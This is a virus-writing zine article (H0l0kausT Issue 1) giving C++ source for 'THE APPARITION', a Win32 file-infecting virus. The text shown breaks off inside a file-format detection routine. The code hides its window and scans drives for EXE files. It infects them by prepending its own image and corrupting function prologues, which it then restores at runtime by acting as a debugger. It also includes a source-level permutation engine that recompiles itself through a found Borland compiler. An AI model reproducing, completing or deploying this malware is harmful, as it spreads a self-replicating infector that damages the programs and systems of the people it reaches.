Copy Link
Add to Bookmark
Report

THE APPARITION for Win32

H0l0kausT Issue 1

eZine's profile picture
Published in 
H0l0kausT
 · 1 year ago
THE APPARITION for Win32
Pin it

--------------------------------------------------------------[winapp32.cpp]-- 
// THE APPARITION for Win32
// Written by LordAsd

#include "winapp32.h"
HWND MainWindow;

#include "scanner.cpp"
#include "diag.cpp"
#include "misc.cpp"
#include "main.cpp"
#include "mutant.cpp"

//Declaration
#pragma argsused
int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpszCmdLine, int cmdShow)
{
MSG msg;;
DiagInit();;
strcpy(CommandLine,lpszCmdLine);;
InitAll();;
if (!AskBoss("RUN RUN RUN?")) return 0;;
LoadCarrier();;
if (GlobalFindAtom(IDAtom)!=0) exit(EXIT_SUCCESS);;
ATOM MyTSRAtom = GlobalAddAtom(IDAtom);;
PrepareSearch();;
// BEGIN TEST

// END TEST
WNDCLASS wcSoundClass;;
wcSoundClass.lpszClassName = WinApp32;;
wcSoundClass.hInstance = hInstance;;
wcSoundClass.lpfnWndProc = MainWndProc;;
wcSoundClass.hCursor = LoadCursor(NULL, IDC_ARROW);;
wcSoundClass.hIcon = LoadIcon(hInstance, IDI_APPLICATION);;
wcSoundClass.lpszMenuName = NULL;;
wcSoundClass.hbrBackground = GetStockObject(WHITE_BRUSH);;
wcSoundClass.style = CS_HREDRAW | CS_VREDRAW;;
wcSoundClass.cbClsExtra = 0;;
wcSoundClass.cbWndExtra = 0;;
RegisterClass(&wcSoundClass);;
MyInstance = hInstance;;

MainWindow = CreateWindow(WinApp32,WinApp32,WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,hInstance,NULL);;

ShowWindow(MainWindow, SW_HIDE);;
UpdateWindow(MainWindow);;
UINT MyTimerID = random(666)+1;
SetTimer(MainWindow,MyTimerID,TimerDelay,NULL);;
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);;
DispatchMessage(&msg);;
}

KillTimer(MainWindow,MyTimerID);;
GlobalDeleteAtom(MyTSRAtom);;
return(msg.wParam);;
};

//Declaration

bool TimerBusy = false;

void wmTimer()
{
if (TimerBusy) return;;
char TargetName[MAX_PATH];;
TimerBusy = true;;
switch (GetNextName(TargetName))
{
case -1 : PrepareSearch();; break;
case 1 : ProcessFile(TargetName);; break;
};;
TimerBusy = false;;
}

//Declaration
LRESULT CALLBACK _export MainWndProc(HWND hWnd, UINT message,
WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_TIMER: wmTimer();; break;
case WM_CREATE: return(DefWindowProc(hWnd, message, wParam, lParam));
case WM_DESTROY: PostQuitMessage(0);; break;
case WM_CLOSE: DestroyWindow(hWnd);; break;
default: return(DefWindowProc(hWnd, message, wParam, lParam));
};;
return(0L);;
};

//Declaration
void InitAll()
{
// Obtain filename & remove double quotes from it
bool quoted = false;;
char* x=GetCommandLine();;
if ((*x)=='\"') {x++;; quoted=true;; }; //;"
strcpy(MyName,x);;
x = MyName;;
while ( (*x)!=0x0)
{
if ( (!quoted)&&((*x)==0x20) ) break;;
if (quoted && ((*x)=='\"')) break;;
x++;;
};;
if ((*(x-1))=='\"
') x--;;
(*x)=0x00;;
// Set errors handling mode
SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOALIGNMENTFAULTEXCEPT |
SEM_NOOPENFILEERRORBOX );;
// System detection
OSVERSIONINFO v;;
v.dwOSVersionInfoSize = sizeof(v);;
GetVersionEx(&v);;
if (v.dwPlatformId==1) System = SYSTEM_WIN95;;
if (v.dwPlatformId==2) System = SYSTEM_WINNT;;

// Invisibility (seems to work OK under WinNT, but I care too much about that)
// if (System==SYSTEM_WIN95)
// {
// DWORD tid = GetCurrentThreadId();;
// asm
// {
// mov eax,fs:[18h]
// sub eax,10h
// xor eax,[tid]
// mov [Fuck],eax
// };;
// DWORD* fl = (DWORD*)((GetCurrentProcessId() ^ Fuck)+0x20);;
// (*fl)|=0x100;;
// };;
// Misc Misc
NoInfect = (GetProfileInt(WinApp32,Ini_NoInfect,0)==1);;
randomize();;
};


//Declaration

void ProcessFile(char* TargetName)
{
Log(TargetName);
char Drive[MAX_PATH];;
char Dir[MAX_PATH];;
char Name[MAX_PATH];;
char Ext[MAX_PATH];;
fnsplit(TargetName,Drive,Dir,Name,Ext);;
if (stricmp(Ext,".EXE")==0)
{ // EXE extension
if (stricmp(Name,"BCC32")==0)
{ // BC compiler (?)
sprintf(BCRoot,"%s%s..",Drive,Dir);;
PermutationEnfine();;
return;;
};;
if (DetectFileFormat(TargetName)==FILE_FORMAT_PE) InfectPE(TargetName);;
};;// EXE extension
};
--------------------------------------------------------------[winapp32.cpp]--
----------------------------------------------------------------[winapp32.h]--
#ifndef _WINAPP32_H_
#define _WINAPP32_H_

#include <windows.h>
#include <wingdi.h>
#include <winbase.h>
#include <winuser.h>
#include <time.h>
#include <shellapi.h>
#include <lzexpand.h>
#include <stdlib.h>
#include <stdio.h>
#include <dir.h>
#include <winnt.h>


// Different compiler settings
#define bool BOOL
#define true TRUE
#define false FALSE


// Declarations from headers that differ in different compilers
typedef struct MY_IMAGE_RESOURCE_DIRECTORY_ENTRY {
union
{
struct { DWORD NameOffset:31; DWORD NameIsString:1; }s;
DWORD Name;
WORD Id;
}u;
union
{
DWORD OffsetToData;
struct { DWORD OffsetToDirectory:31; DWORD DataIsDirectory:1; }s;
}u2;
} MY_IMAGE_RESOURCE_DIRECTORY_ENTRY, *MY_PIMAGE_RESOURCE_DIRECTORY_ENTRY;

// Global constants
#define TimerDelay 1000
#define min_inf_size 10240
#define max_inf_size (700*1024)
#define COPY_BLOCK_SIZE 32768

#define FILE_FORMAT_UNRECOGNIZED 0
#define FILE_FORMAT_MZ 1
#define FILE_FORMAT_NE 2
#define FILE_FORMAT_PE 3
#define FILE_FORMAT_LE 4
#define FILE_FORMAT_LX 5

#define SYSTEM_UNKNOWN 0
#define SYSTEM_WIN95 1
#define SYSTEM_WINNT 2

// Size-related constants
DWORD VSize = 59936; const char vs_const[]="!!! CODE SIZE !!!";
DWORD SSize = 19053; const char ss_const[]="!!! LZ SRC SIZE !!!";

// Misc constants
const char IDAtom[] = "WinApp32_TSR_INSTALLED";
const char WinApp32[] = "WinApp32";
const char Logfing[] = "Logfing";
const char LogPath[] = "LogPath";
const char ShowDotsOn[] = "ShowDotsOn";
const char PM_TargetPath[] = "PMTarget";
const char Ini_NoInfect[] = "NoInfect";
FILETIME MyCoolTime;

// Global variables

bool BadImage = true; // Virus image is invalid or still not loaded
bool Prompt = false;
bool LogfingEnabled = false;
char LogFileName[MAX_PATH];
char MyName[MAX_PATH];
char CommandLine[MAX_PATH];
void* VPtr = NULL;
void* SrcPtr = NULL;
bool Permutated = false;
bool NoInfect = false;
HANDLE MyInstance;
char BCRoot[MAX_PATH];
void* MyIcon;
int System = SYSTEM_UNKNOWN;
DWORD Fuck = 0;

// Procedures
void InitAll();
int PASCAL WinMain(HINSTANCE,HINSTANCE,LPSTR,int);
LRESULT CALLBACK _export MainWndProc(HWND,UINT,WPARAM,LPARAM);
void DiagInit();
void DiagMsg(char* ss);
void Log(char* ss);
bool AskBoss(char* ss);
bool RWDir(char* ss);
void InfectPE(char* TargetName);
void LoadCarrier();
int DetectFileFormat(char* TargetName);
bool GetTempDir(char* s);
char* Ext(char* Name);
bool Already(char* TargetName);
void ProcessFile(char* TargetName);
void PermutationEnfine();
bool Exec(char* Command, char* WorkDir, DWORD TOut = (3*60*1000));
bool Readln(HANDLE h, char* s);
bool Writeln(HANDLE h, const char* s);
int GetNextName(char* ss);
void PrepareSearch();
DWORD FindIcon(char* TargetName);

// Mutation enfine signal strings
const char MUT[] = "/*MUT*/";
const char PM_Declare[] = "//Declaration";
const char PM_EndLine[] = ";;";
// Mutation enfine data
#define MAX_LINE 666
#define MAX_TYPE_ID_LENGTH 30
#define N_TYPES 7
struct TTypeRec
{
char sh[3];
char lo[MAX_TYPE_ID_LENGTH];
int ari;
};
TTypeRec Types[N_TYPES] =
{
{"ui","UINT",1},
{"ii","int",1},
{"uc","unsigned char",1},
{"bo","bool",0},
{"dw","DWORD",1},
{"ch","char",0},
{"hw","HWND",0}
};

#define N_ARI_OP 6
char ari_op[N_ARI_OP][3] = {"+","-","*","^","|","&"};

#define N_API_CALLS 22
struct TApiCallRec
{
char name[50];
bool RetVoid;
char ret_type[3];
int num_params;
char params[5][3];
} ApiCallData[N_API_CALLS] =
{
{"GetVersion",false,"dw",0,{"","","","",""} }, //1
{"AnyPopup",false,"bo",0,{"","","","",""} }, //22
{"FindExecutable",true,"??",3,{"ch","ch","ch","",""} }, //2
{"FindWindow",false,"hw",2,{"ch","ch","","",""} }, //3
{"GdiFlush",true,"??",0,{"","","","",""} }, //4
{"GdiGetBatchLimit",false,"dw",0,{"","","","",""} }, //5
{"GetActiveWindow",false,"hw",0,{"","","","",""} }, //6
{"GetCapture",false,"hw",0,{"","","","",""} }, //7
{"GetCaretBlinkTime",false,"ui",0,{"","","","",""} }, //8
{"GetConsoleCP",false,"ui",0,{"","","","",""} }, //9
{"GetCurrentTime",false,"dw",0,{"","","","",""} }, //10
{"GetDesktopWindow",false,"hw",0,{"","","","",""} }, //11
{"GetDialogBaseUnits",false,"ii",0,{"","","","",""} }, //12
{"GetDoubleClickTime",false,"ui",0,{"","","","",""} }, //13
{"GetForegroundWindow",false,"hw",0,{"","","","",""} }, //14
{"GetInputState",false,"bo",0,{"","","","",""} }, //15
{"GetKBCodePage",false,"ui",0,{"","","","",""} }, //16
{"GetKeyboardLayoutName",false,"bo",1,{"ch","","","",""} }, //17
{"GetKeyboardType",false,"ii",1,{"ii","","","",""} }, //18
{"GetLastError",false,"dw",0,{"","","","",""} }, //19
{"GetLogicalDrives",false,"dw",0,{"","","","",""} }, //20
{"GetTickCount",false,"dw",0,{"","","","",""} } //21
}; // Last letter H in OWL Help

// Fake variables
UINT XXui0,XXui1,XXui2,XXui3;
unsigned char XXuc0,XXuc1,XXuc2,XXuc3;
DWORD XXdw0,XXdw1,XXdw2,XXdw3;
int XXii0,XXii1,XXii2,XXii3;
bool XXbo0,XXbo1,XXbo2,XXbo3;
HWND XXhw0,XXhw1,XXhw2,XXhw3;
char XXch0[MAX_LINE] = "";
char XXch1[MAX_LINE] = "";
char XXch2[MAX_LINE] = "";
char XXch3[MAX_LINE] = "";

// Default icon for console apps infection
char DefaultIcon[744] = {40,0,0,0,32,0,0,0,64,0,0,0,1,0,4,0,0,0,0,0,128,2,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,128,0,0,128,0,0,0,128,128,0,128,
0,0,0,128,0,128,0,128,128,0,0,128,128,128,0,192,192,192,0,0,0,255,0,0,255,0,
0,0,255,255,0,255,0,0,0,255,0,255,0,255,255,0,0,255,255,255,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,119,119,119,119,119,119,119,119,119,119,119,119,119,119,119,112,120,136,
136,136,136,136,136,136,136,136,136,136,136,136,136,112,120,127,255,255,255,
255,255,255,255,255,255,255,255,255,248,112,120,127,255,255,255,255,255,255,
255,255,255,255,255,255,248,112,120,127,255,255,255,255,255,255,255,255,255,
255,255,255,248,112,120,127,255,255,255,255,255,255,255,255,255,255,255,255,
248,112,120,127,255,255,255,255,255,255,255,255,255,255,255,255,248,112,120,
127,255,255,255,255,255,255,255,255,255,255,255,255,248,112,120,127,255,255,
255,255,255,255,255,255,255,255,255,255,248,112,120,127,255,255,255,255,255,
255,255,255,255,255,255,255,248,112,120,127,255,255,255,255,255,255,255,255,
255,255,255,255,248,112,120,127,255,255,255,255,255,255,255,255,255,255,255,
255,248,112,120,127,255,255,255,255,255,255,255,255,255,255,255,255,248,112,
120,127,255,255,255,255,255,255,255,255,255,255,255,255,248,112,120,127,255,
255,255,255,255,255,255,255,255,255,255,255,248,112,120,127,255,255,255,255,
255,255,255,255,255,255,255,255,248,112,120,127,255,255,255,255,255,255,255,
255,255,255,255,255,248,112,120,127,255,255,255,255,255,255,255,255,255,255,
255,255,248,112,120,127,255,255,255,255,255,255,255,255,255,255,255,255,248,
112,120,127,255,255,255,255,255,255,255,255,255,255,255,255,248,112,120,119,
119,119,119,119,119,119,119,119,119,119,119,119,120,112,120,136,136,136,136,
136,136,136,136,136,136,136,136,136,136,112,120,68,68,68,68,68,68,68,68,68,
64,0,0,0,0,112,120,68,68,68,68,68,68,68,68,68,72,128,136,8,128,112,120,68,68,
68,68,68,68,68,68,68,72,128,136,8,128,112,120,68,68,68,68,68,68,68,68,68,68,
68,68,68,68,112,120,136,136,136,136,136,136,136,136,136,136,136,136,136,136,
112,119,119,119,119,119,119,119,119,119,119,119,119,119,119,119,112,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,255,255,255,255
};


#endif
----------------------------------------------------------------[winapp32.h]--
---------------------------------------------------------------[scanner.cpp]--
#include "winapp32.h"

// Data structures

#define MAX_LEVELS 13

struct se_LevelRec
{
char path[MAX_PATH];
HANDLE h;
};


char scan_drive = 'C';
se_LevelRec* se_Data[MAX_LEVELS];
int se_Current = 0;
bool se_Initialized = false;


// Initializes variables (allocates memory)
//Declaration
void se_Init()
{
if (se_Initialized) return;;
se_Initialized=true;;
int i;;
for (i=0; i<MAX_LEVELS; i++) se_Data[i] = new se_LevelRec;;
(*se_Data[0]).path[0]=scan_drive;;
(*se_Data[0]).path[1]=':';;
(*se_Data[0]).path[2]=0x0;;
(*se_Data[0]).h=INVALID_HANDLE_VALUE;;
};

bool filter_Good, filter_Bad;

//Declaration
// Filname filter
void se_NameFilter(char* ss)
{
while ((*ss)!=0) ss++;;
ss=ss-4;;
if (stricmp(ss,".EXE")==0) return;;
if (stricmp((ss-2),"BC.EXE")==0) filter_Good = true;;
if (stricmp(ss,".ARJ")==0) filter_Good = true;;
if (stricmp(ss,".ZIP")==0) filter_Good = true;;
if (stricmp(ss,".RAR")==0) filter_Good = true;;
}

// Goes down one level to specified dir,
// if dir does not exist or path overflow occurs(?),
// leaves the current state unchanged
//Declaration
void se_DownOneLevel(char* ss)
{
if (se_Current==(MAX_LEVELS-1)) return;;
if ((strlen(ss)+20)>MAX_PATH) return;;
strcpy((*se_Data[se_Current+1]).path,ss);;
se_Current++;;
(*se_Data[se_Current]).h=INVALID_HANDLE_VALUE;;
};

// Goes up one level, returns 0 if OK, -1 otherwise
//Declaration
int se_UpOneLevel()
{
if (se_Current==0) { return -1;; }
else
{
FindClose((*se_Data[se_Current]).h);;
se_Current--;;
return 0;;
};;
};


// Returns 1 if OK, 0 if this one must be skipped and
// -1 if no more files
int GetNextName(char* ss)
{
int RescanAttempts = 0;;
se_Init();;
WIN32_FIND_DATA wfd;;
char f_path[MAX_PATH];;
strcpy(f_path,(*se_Data[se_Current]).path);;
strcat(f_path,"\\*.*");;

_rescan:
if (RescanAttempts>69) return 0;;
if ((*se_Data[se_Current]).h==INVALID_HANDLE_VALUE)
{ // start search
(*se_Data[se_Current]).h=FindFirstFile(f_path,&wfd);;
if ((*se_Data[se_Current]).h==INVALID_HANDLE_VALUE) return se_UpOneLevel();;
}
else
{// continue search
if (!FindNextFile((*se_Data[se_Current]).h,&wfd)) return se_UpOneLevel();;
};;
// What is this shit ?! Refuse... Resist...
if (strlen(wfd.cFileName)==0) return 0;;
char suxx[MAX_PATH];;
strcpy(suxx,wfd.cFileName);;
sprintf(ss,"%s\\%s",(*se_Data[se_Current]).path,suxx);;
if ((wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)!=0)
{
if (suxx[0]!='.') se_DownOneLevel(ss);;
return 0;;
};;
if (wfd.nFileSizeHigh!=0) goto _rescan;;

filter_Good = false;;
filter_Bad = false;;
se_NameFilter(ss);
if (wfd.nFileSizeLow<min_inf_size) filter_Bad = true;;
if (wfd.nFileSizeLow>max_inf_size) filter_Bad = true;;
RescanAttempts++;;

if ((filter_Bad)&&(!filter_Good)) goto _rescan;

return 1;;
};

// Initializes drive(s) to search, returns 0 if OK, -1 otherwise

void PrepareSearch()
{
char ss[]="?:\\";;
if (scan_drive=='[') scan_drive='C';;
ss[0]=scan_drive;;
while ((!RWDir(ss))&&(ss[0]<'Z')) ss[0]++;;
scan_drive=ss[0];;
}
---------------------------------------------------------------[scanner.cpp]--
------------------------------------------------------------------[diag.cpp]--

#ifndef _APP_DIAG_CPP_
#define _APP_DIAG_CPP_

#include "winapp32.h"
//Declaration
void DiagInit()
{
char ss[MAX_PATH];;
Prompt=(GetProfileInt(WinApp32,ShowDotsOn,0)==1);;
GetProfileString(WinApp32,Logfing,"NO",ss,MAX_PATH);;
if (stricmp("YES",ss)==0) LogfingEnabled=true;;
GetWindowsDirectory(ss,MAX_PATH);;
strcat(ss,"\\WINAPP32.LOG");;
GetProfileString(WinApp32,LogPath,ss,LogFileName,MAX_PATH);;
};
//Declaration
void DiagMsg(char* ss)
{
if (LogfingEnabled)
MessageBox(0,ss,"",MB_OK | MB_ICONINFORMATION | MB_TASKMODAL);;
};
//Declaration
void Log(char* ss)
{
HANDLE h=CreateFile(LogFileName,GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);;
if (h==INVALID_HANDLE_VALUE) return;;
SetFilePointer(h,0,NULL,FILE_END);;
char xx[MAX_PATH+666];;
time_t timer;;
struct tm *tblock;;
timer = time(NULL);;
tblock = localtime(&timer);;
char glu[30];;
strcpy(glu,asctime(tblock));;
glu[24]=0x0;;
char Drive[MAX_PATH];;
char Dir[MAX_PATH];;
char Name[MAX_PATH];;
char Ext[MAX_PATH];;
fnsplit(MyName,Drive,Dir,Name,Ext);;
sprintf(xx," %08s at %s : %s\xD\xA",Name,glu,ss);;
DWORD z;;
WriteFile(h,xx,strlen(xx),&z,NULL);;
CloseHandle(h);;
};
//Declaration
bool AskBoss(char* ss)
{
if (!Prompt) return true;;
return (MessageBox(0,ss,"?",
MB_YESNO | MB_ICONQUESTION)==IDYES);;
};

#endif
------------------------------------------------------------------[diag.cpp]--
------------------------------------------------------------------[misc.cpp]--
#include "winapp32.h"
// Checks if given directory is not write-protected
// Returns TRUE if write allowed
//Declaration
bool RWDir(char* s)
{
char ss[MAX_PATH];;
strcpy(ss,s);;
if (ss[strlen(ss)-1]!='\\') {strcat(ss,"\\");};;
strcat(ss,"TMPTMP.$11");;
HANDLE h=CreateFile(ss,GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_FLAG_DELETE_ON_CLOSE,NULL);;
if (h==INVALID_HANDLE_VALUE) return false;;
CloseHandle(h);;
return true;;
}

// Looks for temp directory path, returns TRUE if writable dir found
//Declaration
bool GetTempDir(char* s)
{
GetEnvironmentVariable("TEMP",s,MAX_PATH);;
if (RWDir(s)) return true;;
GetEnvironmentVariable("TMP",s,MAX_PATH);;
if (RWDir(s)) return true;;
GetWindowsDirectory(s,MAX_PATH);;
if (RWDir(s)) return true;;
return false;;
}


// Returns pointer to filename extension (to '\0' if no extension)
//Declaration
char* Ext(char* Name)
{
char* x = Name;;
while ((*x)!=0) x++;;
if ((*(x-1))=='.') return (x);;
if ((*(x-2))=='.') return (x-2);;
if ((*(x-3))=='.') return (x-3);;
if ((*(x-4))=='.') return (x-4);;
return x;;
};


// Runs specified external application and waits for it's termination
// Returns FALSE if an error occurs
//Declaration
bool Exec(char* Command, char* WorkDir, DWORD TOut)
{
Log(Command);;
STARTUPINFO SInfo;;
GetStartupInfo(&SInfo);;
SInfo.dwFlags = STARTF_USESHOWWINDOW;;
SInfo.wShowWindow = SW_HIDE;;
PROCESS_INFORMATION Executed;;
bool x = CreateProcess(NULL,Command,NULL,NULL,false,
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_PROCESS_GROUP | NORMAL_PRIORITY_CLASS,
NULL,WorkDir,&SInfo,&Executed);;
if (!x) return false;;
WaitForSingleObject(Executed.hProcess,TOut);;
return true;;
};

//Declaration
bool Readln(HANDLE h, char* s)
{
if (h==INVALID_HANDLE_VALUE) return false;;
strcpy(s,"");;
char shit[]="?";;
while ((strlen(s)<2)|(s[strlen(s)-2]!='\xD')|(s[strlen(s)-1]!='\xA'))
{
DWORD readed = 0;;
ReadFile(h,&shit,1,&readed,NULL);;
if (readed!=1) return false;;
if (shit[0]!='\0') strcat(s,shit);;
};;
if (strlen(s)>=2) s[strlen(s)-2]='\0';;
return true;;
};
//Declaration
bool Writeln(HANDLE h, const char* s)
{
if (h==INVALID_HANDLE_VALUE) return false;;
DWORD written1 = 0;;
DWORD written2 = 0;;
char ss[] = "\xD\xA";;
WriteFile(h,s,strlen(s),&written1,0);;
WriteFile(h,ss,2,&written2,0);;
return ((written1==strlen(s))&&(written2==2));;
};

//Declaration
------------------------------------------------------------------[misc.cpp]--
------------------------------------------------------------------[main.cpp]--
#include "winapp32.h"

/******************************************************************************/
/* Procedure checks if PE is already infected */
/******************************************************************************/
//Declaration
bool Already(char* TargetName)
{
bool x = false;;
HANDLE h1 = CreateFile(TargetName,GENERIC_READ, FILE_SHARE_READ |
FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);;
if (h1==INVALID_HANDLE_VALUE) {return false;;};;
DWORD readed;;
WORD addr = 0;;
SetFilePointer(h1,0x3C,NULL,FILE_BEGIN);;
ReadFile(h1,&addr,2,&readed,NULL);;
SetFilePointer(h1,addr-2,NULL,FILE_BEGIN);;
char ss[2]="XX";;
ReadFile(h1,&ss,2,&readed,NULL);;
if ((readed==2) && (ss[0]=='L') && (ss[1]=='A')) {x=true;;};;
CloseHandle(h1);;
return x;;
};


/******************************************************************************/
/* MAIN INFECTION ENGINE - Win32 PE */
/******************************************************************************/
bool infector_busy = false;
//Declaration
void InfectPE(char* TargetName)
{
if ((BadImage)||(NoInfect)||(infector_busy)||(VPtr==NULL)) return;;
char ss[MAX_PATH+666]="Process ";;
strcat(ss,TargetName);;
infector_busy=true;;
char Temp[MAX_PATH];;
if (!GetTempDir(Temp))
{ infector_busy=false;; return;; };;
Log(TargetName);;
if (DetectFileFormat(TargetName)!=FILE_FORMAT_PE)
{ infector_busy=false;; return;; };;
if (Already(TargetName))
{ infector_busy=false;; return;; };;
if (!AskBoss(ss))
{ infector_busy=false;; return;; };;
DWORD NewIcon = FindIcon(TargetName);;
char buf[COPY_BLOCK_SIZE];;
HANDLE h1 = CreateFile(TargetName,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);;
strcat(Temp,"\\TMP$$001.TMP");;
HANDLE h2 = CreateFile(Temp,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);;
if ((h1==INVALID_HANDLE_VALUE)||(h2==INVALID_HANDLE_VALUE))
{
CloseHandle(h1);;
CloseHandle(h2);;
DeleteFile(Temp);;
infector_busy=false;;
return;;
};;
DWORD readed;;
if (NewIcon!=0)
{
SetFilePointer(h1,NewIcon,NULL,FILE_BEGIN);;
ReadFile(h1,MyIcon,744,&readed,NULL);;
SetFilePointer(h1,0,NULL,FILE_BEGIN);;
}
else
{ memmove(MyIcon,DefaultIcon,744);; };;
DWORD written;;
WriteFile(h2,VPtr,VSize,&written,NULL);;
WriteFile(h2,SrcPtr,SSize,&written,NULL);;
do
{
ReadFile(h1,&buf,sizeof(buf),&readed,NULL);;
char* t = buf;;
for (int i=0; i<(sizeof(buf)-5); i++)
{
if ( ((*t)=='\x55')&&((*(t+1))=='\x8B')&&((*(t+2))=='\xEC') )
{
(*t) = '\xFF';;
(*(t+1)) = '\xFF';;
(*(t+2)) = random(256);;
};;
t++;;
};;
if (!WriteFile(h2,&buf,readed,&written,NULL))
{
CloseHandle(h1);; CloseHandle(h2);;
DeleteFile(Temp);; infector_busy=false;;
return;;
};; // End if
} while (readed==sizeof(buf));; // End do
CloseHandle(h1);;
CloseHandle(h2);;
DeleteFile(TargetName);;
if (!MoveFile(Temp,TargetName))
{ DeleteFile(Temp);; infector_busy=false;; return;; };;
infector_busy=false;;
sprintf(ss,"Processed - %s",TargetName);
Log(ss);;
};

/******************************************************************************/
/* ORIGINAL FILE LOADER */
/******************************************************************************/

//Declaration
void LoadCarrier()
{
VPtr = malloc(VSize);;
SrcPtr = malloc(SSize);;
DWORD delta;;
if ((delta=FindIcon(MyName))==0) return;;
MyIcon = (void*)(DWORD(VPtr)+delta);;
HANDLE h1 = CreateFile(MyName,GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,0,NULL);;
if (h1==INVALID_HANDLE_VALUE) exit(EXIT_FAILURE);;
DWORD FileSize = SetFilePointer(h1,0,NULL,FILE_END);;
SetFilePointer(h1,0,NULL,FILE_BEGIN);;
if (FileSize<(VSize+SSize)) exit(EXIT_FAILURE);;
DWORD readed;;
ReadFile(h1,VPtr,VSize,&readed,NULL);;
ReadFile(h1,SrcPtr,SSize,&readed,NULL);;
BadImage = false;;
if (FileSize==(VSize+SSize)) {CloseHandle(h1);; return;; };;
char Drive[MAX_PATH];;
char Dir[MAX_PATH];;
char Name[MAX_PATH];;
char Ext[MAX_PATH];;
char TempName[MAX_PATH];;
fnsplit(MyName,Drive,Dir,Name,Ext);;
HANDLE h2;;
int i;;
for (i=0; i<999; i++)
{
char ss[5];;
sprintf(ss,".%03u",i);;
strcpy(TempName,Drive);;
strcat(TempName,Dir);;
if (!RWDir(TempName))
if (!GetTempDir(TempName)) return;;
strcat(TempName,Name);;
strcat(TempName,ss);;
h2 = CreateFile(TempName,GENERIC_WRITE,0,NULL,CREATE_NEW,0,NULL);;
if (h2!=INVALID_HANDLE_VALUE) break;;
};
if (h2==INVALID_HANDLE_VALUE) return;;
char buf[COPY_BLOCK_SIZE];;
DWORD written;;
do
{
ReadFile(h1,&buf,sizeof(buf),&readed,NULL);;
WriteFile(h2,&buf,readed,&written,NULL);;
} while (readed==sizeof(buf));;
CloseHandle(h1);;
CloseHandle(h2);;
STARTUPINFO SInfo;;
PROCESS_INFORMATION PInfo;;
GetStartupInfo(&SInfo);;
sprintf(buf,"%s%s",Drive,Dir);
Log(buf);
if (!CreateProcess(TempName,CommandLine,NULL,NULL,FALSE,
DEBUG_ONLY_THIS_PROCESS | CREATE_DEFAULT_ERROR_MODE,
NULL,buf,&SInfo,&PInfo))
{DeleteFile(TempName);; return;; };;
BOOL ExceptionHandled = false;;
BOOL ExceptionOK;;
DEBUG_EVENT Event;;
BOOL last;;
do
{
ExceptionOK = true;;
WaitForDebugEvent(&Event,INFINITE);;
if (Event.dwProcessId!=PInfo.dwProcessId)
{
ContinueDebugEvent(Event.dwProcessId,Event.dwThreadId,DBG_EXCEPTION_NOT_HANDLED);;
continue;;
};;
ExceptionOK = true;;
last = (Event.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT);;
if (Event.dwDebugEventCode == EXCEPTION_DEBUG_EVENT)
{ // Handle exception :E
ExceptionOK = false;;
if ((Event.u.Exception.ExceptionRecord.ExceptionCode==EXCEPTION_ILLEGAL_INSTRUCTION)&&
(Event.u.Exception.ExceptionRecord.ExceptionFlags!=EXCEPTION_NONCONTINUABLE))
{
WORD Glitch = 0;;
DWORD readed = 0;;
ReadProcessMemory(PInfo.hProcess,Event.u.Exception.ExceptionRecord
.ExceptionAddress,&Glitch,2,&readed);;
if (Glitch == 0xFFFF)
{
char SHIT[3]="\x55\x8B\xEC";;
DWORD written = 0;;
WriteProcessMemory(PInfo.hProcess,
Event.u.Exception.ExceptionRecord.ExceptionAddress,&SHIT,3,&written);;
ExceptionHandled = true;;
ExceptionOK = (written==3);;
};;
};;
};; // EXCEPTION_DEBUG_EVENT
if (ExceptionHandled)
ContinueDebugEvent(Event.dwProcessId,Event.dwThreadId,DBG_CONTINUE);;
else
{
ContinueDebugEvent(Event.dwProcessId,Event.dwThreadId,DBG_EXCEPTION_NOT_HANDLED);;
Log("Exception not handled");;
};
}
while (!last);;
DWORD TStatus;;
do
{ GetExitCodeProcess(PInfo.hProcess,&TStatus);; }
while (TStatus==STILL_ACTIVE);;
if (ExceptionHandled) Log("There were exceptions handled in this process");;
for (i=0; i<13; i++)
{
Sleep(1000);;
if (DeleteFile(TempName)) break;;
};;
Log("File deleted");
}

/******************************************************************************/
/* FILE FORMAT DETECTION */
/******************************************************************************/

//Declaration
int DetectFileFormat(char* TargetName)
{
int x = FILE_FORMAT_UNRECOGNIZED;;
unsigned char header[0x100];;
DWORD readed;;
HANDLE h = CreateFile(TargetName,GENERIC_READ, FILE_SHARE_READ |
FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);;
if (h==INVALID_HANDLE_VALUE) return x;;
ReadFile(h,&header,sizeof(header),&readed,NULL);;
if (readed!=sizeof(header)) { CloseHandle(h); return x;; };;
WORD w = *((WORD*)header);
if (w!=0x5A4D) return x;;
x=FILE_FORMAT_MZ;;
UINT jaddr = (header[0x3C]+header[0x3D]*0x100);;
SetFilePointer(h,jaddr,NULL,FILE_BEGIN);;
ReadFile(h,&header,sizeof(header),&readed,NULL);;
